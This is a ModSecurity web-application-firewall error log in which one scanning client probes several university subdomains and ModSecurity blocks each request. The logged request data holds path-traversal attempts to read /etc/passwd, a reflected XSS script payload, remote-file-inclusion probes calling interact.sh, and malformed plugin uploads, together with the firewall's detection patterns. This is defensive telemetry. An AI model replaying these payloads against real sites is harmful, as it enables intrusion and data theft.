[Tue Aug 29 11:54:57.539635 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqRzGgAAAAM"]
[Tue Aug 29 11:54:57.539689 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqRzGgAAAAM"]
[Tue Aug 29 11:54:57.626652 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqWwbwAAAAl"]
[Tue Aug 29 11:54:57.626727 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqWwbwAAAAl"]
[Tue Aug 29 11:54:57.880039 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqhOAoAAAAE"]
[Tue Aug 29 11:54:57.880120 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqhOAoAAAAE"]
[Tue Aug 29 11:54:57.892941 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApbUZMAAAAh"]
[Tue Aug 29 11:54:57.893013 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApbUZMAAAAh"]
[Tue Aug 29 11:54:58.078869 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApk-aYAAAAn"]
[Tue Aug 29 11:54:58.216102 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApXgjEAAAAU"]
[Tue Aug 29 11:54:58.245243 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqSwmYAAAAN"]
[Tue Aug 29 11:54:58.300150 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqSwmcAAAAN"]
[Tue Aug 29 11:54:58.300412 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqRzG0AAAAM"]
[Tue Aug 29 11:54:58.308502 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAoz7-QAAAAS"]
[Tue Aug 29 11:54:58.308590 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAoz7-QAAAAS"]
[Tue Aug 29 11:54:58.673062 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqWwcQAAAAl"]
[Tue Aug 29 11:54:58.673316 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqWwcQAAAAl"]
[Tue Aug 29 11:54:58.742421 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqSwmwAAAAN"]
[Tue Aug 29 11:54:59.577088 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAApa-J8AAAAg"]
[Tue Aug 29 11:54:59.636828 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoAk9sAAAAC"]
[Tue Aug 29 11:54:59.644548 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16I8Co-f0AAAqWwckAAAAl"]
[Tue Aug 29 11:54:59.644580 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAApXgjYAAAAU"]
[Tue Aug 29 11:54:59.648971 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqRzHEAAAAM"]
[Tue Aug 29 11:54:59.657783 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoz7-oAAAAS"]
[Tue Aug 29 11:54:59.777397 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqY5@EAAAAr"]
[Tue Aug 29 11:54:59.778504 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqSwnAAAAAN"]
[Tue Aug 29 11:54:59.807788 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqTvmwAAAAa"]
[Tue Aug 29 11:54:59.818614 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqSwnEAAAAN"]
[Tue Aug 29 11:54:59.852531 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAqSwnIAAAAN"]
[Tue Aug 29 11:55:00.661597 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16JMCo-f0AAAqhOBsAAAAE"]
[Tue Aug 29 11:55:00.668571 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/"] [unique_id "ZO16JMCo-f0AAApa-KQAAAAg"]
[Tue Aug 29 11:55:02.656670 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqqtZQAAAAA"]
[Tue Aug 29 11:55:02.802209 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAoz8AgAAAAS"]
[Tue Aug 29 11:55:02.825906 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqTvnYAAAAa"]
[Tue Aug 29 11:55:02.836163 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAoz8AkAAAAS"]
[Tue Aug 29 11:55:02.888757 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqTvnkAAAAa"]
[Tue Aug 29 11:55:03.927922 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAoAk@kAAAAC"]
[Tue Aug 29 11:55:04.179876 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqhOCsAAAAE"]
[Tue Aug 29 11:55:04.245542 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAoz8BIAAAAS"]
[Tue Aug 29 11:55:04.253092 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqsV1MAAAAB"]
